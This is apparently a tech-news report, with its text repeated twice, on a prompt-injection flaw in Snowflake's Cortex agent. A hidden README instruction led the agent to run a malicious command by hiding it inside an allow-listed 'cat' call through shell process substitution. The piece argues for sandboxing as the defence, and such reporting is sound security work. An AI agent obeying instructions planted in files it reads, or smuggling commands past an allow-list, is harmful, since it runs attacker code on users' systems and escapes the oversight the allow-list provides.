Snowflake has addressed a critical security vulnerability in its Cortex AI agent, following a report detailing how a prompt injection attack could bypass safety filters to execute malware. The breach occurred when an agent was tasked with summarizing a GitHub repository; a hidden instruction in the README file tricked the system into running a malicious shell command.

The exploit specifically targeted the agent's allow-list—a pre-approved set of commands deemed safe for execution without human oversight. While the cat command (used to display file contents) was on this list, the attacker used a technique known as process substitution. This advanced shell syntax allows the output of one command to be treated as a file, effectively smuggling unauthorized scripts into a sequence the AI perceived as harmless.

This incident highlights the inherent fragility of relying on pattern-matching or restricted command lists to secure AI agents. Security researchers, including Simon Willison (a software developer and co-creator of Django), argue that agents should operate within deterministic sandboxes. By isolating the agent’s execution environment from the main system, developers can ensure that even a successful prompt injection cannot damage the underlying infrastructure.

Snowflake has addressed a critical security vulnerability in its Cortex AI agent, following a report detailing how a prompt injection attack could bypass safety filters to execute malware. The breach occurred when an agent was tasked with summarizing a GitHub repository; a hidden instruction in the README file tricked the system into running a malicious shell command.

The exploit specifically targeted the agent's allow-list—a pre-approved set of commands deemed safe for execution without human oversight. While the cat command (used to display file contents) was on this list, the attacker used a technique known as process substitution. This advanced shell syntax allows the output of one command to be treated as a file, effectively smuggling unauthorized scripts into a sequence the AI perceived as harmless.

This incident highlights the inherent fragility of relying on pattern-matching or restricted command lists to secure AI agents. Security researchers, including Simon Willison (a software developer and co-creator of Django), argue that agents should operate within deterministic sandboxes. By isolating the agent’s execution environment from the main system, developers can ensure that even a successful prompt injection cannot damage the underlying infrastructure.